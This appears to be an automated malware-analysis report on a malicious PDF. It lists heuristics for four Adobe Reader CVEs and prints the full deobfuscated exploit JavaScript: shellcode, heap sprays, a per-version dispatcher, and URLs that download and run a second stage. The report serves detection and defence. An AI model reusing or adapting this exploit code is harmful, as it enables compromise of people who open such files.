MALICIOUS
450
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple known vulnerabilities in Adobe Reader. The script attempts to download and execute a second-stage payload from the URLs provided. The deobfuscated JavaScript explicitly constructs the URL 'http://cheska.cz.cc/load.php?sploit=PDF_newPlayer' and similar variants for other exploits, indicating a downloader functionality.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 11
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://cheska.cz.cc/load.php?sploit=PDF_newPlayer Referenced by PDF JavaScript
- http://cheska.cz.cc/load.php?sploit=PDF_printfReferenced by PDF JavaScript
- http://cheska.cz.cc/load.php?sploit=PDF_GetIconReferenced by PDF JavaScript
- http://cheska.cz.cc/load.php?sploit=PDF_CollabReferenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0xF92 | 93 bytes |
SHA-256: 61b46047f90b888a00e497def64b956f6da2cb6e69e8905a21e0ba446aa10cd0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
m1=this.info.gkds;m2=m1.replace(/zzzzz/g,"");m3=this.info.gggsd+"al"; app[m3](m2); |
|||
info_stride_js_000.js |
deobfuscated-js | PDF /Info fields via stride 6 | 4766 bytes |
SHA-256: 161aec3f49fa4453fe7fb26db6bc1765f4eb4c2f6600241021f747df18674b9a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function shcode(cUHc)
{
vIQr = "%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
return vIQr+cUHc;
}
function Lb4lR() {
function B98EwA()
{
var I8P8="p@111111111111111111111111 : yyyy111";
util.printd(I8P8, new Date());
}
var m3nQxO=12000;
dKu=new Array();
var Tmuv = "%u9090%u9090";
var MQFq0=shcode("%u7468%u7074%u2F3A%u632F%u6568%u6B73%u2E61%u7A63%u632E%u2F63%u6F6C%u6461%u702E%u7068%u733F%u6C70%u696F%u3D74%u4450%u5F46%u656E%u5077%u616C%u6579%u0072");
Tmuv=unescape(Tmuv);
MQFq0=unescape(MQFq0);
while(Tmuv.length <= 0x8000){Tmuv+=Tmuv;}
Tmuv=Tmuv.substr(0,0x8000 - MQFq0.length);
for(Jp9A=0;Jp9A<m3nQxO;Jp9A++) {dKu[Jp9A]=Tmuv + MQFq0;}
if(m3nQxO){B98EwA();B98EwA();try {this.media.newPlayer(null);} catch(e) {}B98EwA();}
}
function jkD() {
var yktvQt=unescape(shcode("%u7468%u7074%u2F3A%u632F%u6568%u6B73%u2E61%u7A63%u632E%u2F63%u6F6C%u6461%u702E%u7068%u733F%u6C70%u696F%u3D74%u4450%u5F46%u7270%u6E69%u6674"));
var Q2Re ="";
for (zqK6q=128;zqK6q>=0;--zqK6q) Q2Re += unescape("%u9090%u9090%u9090%u9090%u9090");
v3tje = Q2Re + yktvQt;
UwMu3 = unescape("%u9090%u9090");
V7hf = 20;
nw9rrZ = V7hf+v3tje.length;
while (UwMu3.length<nw9rrZ) UwMu3+=UwMu3;
G2f144 = UwMu3.substring(0, nw9rrZ);
x4mHi6 = UwMu3.substring(0, UwMu3.length-nw9rrZ);
while(x4mHi6.length+nw9rrZ < 0x40000) x4mHi6 = x4mHi6+x4mHi6+G2f144;
iP3PO = new Array();
for (i=0;i<1400;i++) iP3PO[i] = x4mHi6 + v3tje;
var LIP7 = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",LIP7);
}
function ZoB() {
var r3ar6y=unescape(shcode("%u7468%u7074%u2F3A%u632F%u6568%u6B73%u2E61%u7A63%u632E%u2F63%u6F6C%u6461%u702E%u7068%u733F%u6C70%u696F%u3D74%u4450%u5F46%u6547%u4974%u6F63%u006E"));
h2jCn = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + r3ar6y;
dBF = unescape("%u9090%u9090");
V7hf = 10;
loain = V7hf+h2jCn.length;
while (dBF.length<loain) dBF+=dBF;
G2f144 = dBF.substring(0, loain);
KAID = dBF.substring(0, dBF.length-loain);
while(KAID.length+loain<0x40000) KAID = KAID+KAID+G2f144;
iP1 = new Array();
for (i=0;i<180;i++) iP1[i] = KAID + h2jCn;
var BBu7c = 4012;
var DHRL72 = Array(BBu7c);
for (i=0; i<BBu7c; i++)
{
DHRL72[i] = unescape("%0a%0a%0a%0a");
}
Collab.getIcon(DHRL72+"_N.bundle");
}
function LbBu() {
function t8h(ARikD,lJx2) {
while(ARikD.length*2<lJx2) { ARikD+=ARikD; }
ARikD=ARikD.substring(0,lJx2/2);
return ARikD; }
var iQ8=unescape(shcode("%u7468%u7074%u2F3A%u632F%u6568%u6B73%u2E61%u7A63%u632E%u2F63%u6F6C%u6461%u702E%u7068%u733F%u6C70%u696F%u3D74%u4450%u5F46%u6F43%u6C6C%u6261"));
var BQ5ye3=new Array();
var Lu8=0x0c0c0c0c;
var B9KR2=0x400000;
var Wkm8lF=iQ8.length*2;
var lJx2=B9KR2-(Wkm8lF+0x38);
var ARikD=unescape("%u9090%u9090");
ARikD=t8h(ARikD,lJx2);
var OG0ih=(Lu8-0x400000)/B9KR2;
for(var dZiS=0;dZiS<OG0ih;dZiS++) {BQ5ye3[dZiS]=ARikD+iQ8; }
var VVac=unescape("%u0c0c%u0c0c");
while(VVac.length<44952) {VVac+=VVac; }
this.collabStore=Collab.collectEmailInfo( { subj:"",msg:VVac } );
}
aPlugins = app.plugIns;
var fpAqA=parseInt(app.viewerVersion.toString().charAt(0));
for (var SCVbyc=0; SCVbyc < aPlugins.length; SCVbyc++)
{
if (aPlugins[SCVbyc].name=="EScript")
{
var Z46=aPlugins[SCVbyc].version;
}
}
if ((Z46==9)||((fpAqA==8)&&(Z46<=8.12)))
{
ZoB();
}
else if (Z46==7.1)
{
jkD();
}
else if (((fpAqA==6)||(fpAqA==7))&&(Z46<7.11))
{
LbBu();
}
else if ((Z46 >= 9.1) || (Z46 <= 9.2) || (Z46 >= 8.13) || (Z46 <= 8.17))
{
Lb4lR();
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.